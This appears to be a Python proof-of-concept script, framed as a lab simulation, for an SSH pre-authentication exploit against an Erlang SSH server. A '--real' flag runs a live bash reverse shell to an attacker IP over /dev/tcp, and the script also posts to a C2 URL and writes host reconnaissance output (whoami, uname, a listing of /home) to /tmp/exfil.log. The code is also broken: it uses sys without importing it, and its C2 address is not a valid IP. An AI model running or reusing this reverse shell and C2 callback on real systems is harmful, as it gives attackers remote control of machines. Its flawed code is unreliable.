import socket import time import os import requests # === Lab Setup === target_ip = "127.0.0.1" # change this to your VM or leave as loopback attacker_ip = "192.168.1.1" # change if needed attacker_port = 4444 c2_url = "http://22.22.333.333:8080/report" #change to your c2 ip # === Fake SSH Exploit === def build_ssh_version(): return b'SSH-2.0-ErlangTest_0.1\r\n' def build_crafted_packet(): return b"\x00\x00\x00\x10" + b"\x41" * 16 def trigger_reverse_shell(): if '--real' in sys.argv: print(f"[+] Launching real reverse shell to {attacker_ip}:{attacker_port}") os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'") else: try: print(f"[+] Sending simulated reverse shell report to C2 at {c2_url}") requests.post(c2_url, data="💥 Simulated reverse shell triggered to attacker machine!") except Exception as e: print(f"[!] Callback failed: {e}") def simulate_post_exploitation(): print("[+] Simulating post-exploitation behavior...") # Command 1: whoami os.system("whoami >> /tmp/exfil.log") # Command 2: system info os.system("uname -a >> /tmp/exfil.log") # Command 3: show directory structure os.system("ls -alh /home/ >> /tmp/exfil.log") # Dummy credentials with open("/tmp/exfil.log", "a") as f: f.write("\n[+] Simulated exfil of dummy credentials...\n") f.write("username: admin\npassword: hunter2\n") print("[+] Post-exploitation simulation written to /tmp/exfil.log") def send_exploit(): print(f"[+] Connecting to target {target_ip}:22...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, 22)) sock.sendall(build_ssh_version()) print(f"[+] Sent SSH version string") time.sleep(0.5) sock.sendall(build_crafted_packet()) print(f"[+] Sent crafted SSH pre-auth packet") time.sleep(0.5) sock.close() except Exception as e: print(f"[!] Could not connect/send to target: {e}") # Simulated shell + post-exploitation trigger_reverse_shell() time.sleep(1) simulate_post_exploitation() if __name__ == "__main__": send_exploit()